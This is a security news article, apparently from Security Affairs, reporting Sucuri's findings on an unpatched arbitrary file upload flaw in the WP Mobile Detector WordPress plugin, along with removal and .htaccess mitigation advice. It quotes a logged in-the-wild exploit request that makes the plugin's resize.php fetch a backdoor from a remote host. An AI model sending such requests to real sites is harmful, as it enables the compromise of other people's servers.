Security experts at Sucuri reported that a growing number of WordPress installations have been compromised by hackers exploiting a security flaw in a widely used plugin called WP Mobile Detector.
The worrisome news is that the vulnerability exploited by threat actors in the wild remains unpatched.
According to the experts at Sucuri, the hackers mainly exploited the flaw in the WP Mobile Detector plugin to install porn-related spamming scripts.
The plugin has been removed from the official WordPress plugin directory after the disclosure of the vulnerability.
“Our research team started to dig into the issue and found that the common denominator across these WordPress sites was the plugin WP Mobile Detector that had a 0-day arbitrary file upload vulnerability disclosed on May 31st. The plugin has since been removed from the WordPress repository and no patches are available.” reported a blog post published by Sucuri. “This vulnerability was publicly disclosed May 31st, but according to our firewall logs, the attack has been going since May 27th. “
It has been estimated that the plugin had more than 10,000 active installations, and many of them are still vulnerable to cyber attacks.
The flaw results from the plugin failure of the input validation that allows attackers to submit malicious PHP code in input.
“The vulnerability is very easy to exploit,” continues Sucuri. “All the attacker needs to do is send a request to resize.php or timthumb.php (yes, timthumb, in this case it just includes resize.php), inside the plugin directory with the backdoor URL.”
This is one of the payloads we are actively seeing in the wild:
220.127.116.11 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"
The experts highlight that there is no fix available, this means that it is better to uninstall the flawed WP Mobile Detector plugin.
“We highly recommend everyone to remove this plugin for now. If you really need this plugin, the partial temporary fix will be to disable PHP execution in the wp-mobile-detector/cache subdirectory, for example using this code in the .htaccess file.”
<Files *.php> deny from all </Files>
Administrators of infected WordPress websites can request support to Sucuri.
If you appreciate my effort in spreading cyber security awareness, please vote for Security Affairs as best European Security Blog. Vote SecurityAffairs in every section it is reported. I’m one of the finalists and I want to demonstrate that the Security Affairs community a great reality.
(Security Affairs – WP Mobile Detector, WordPress)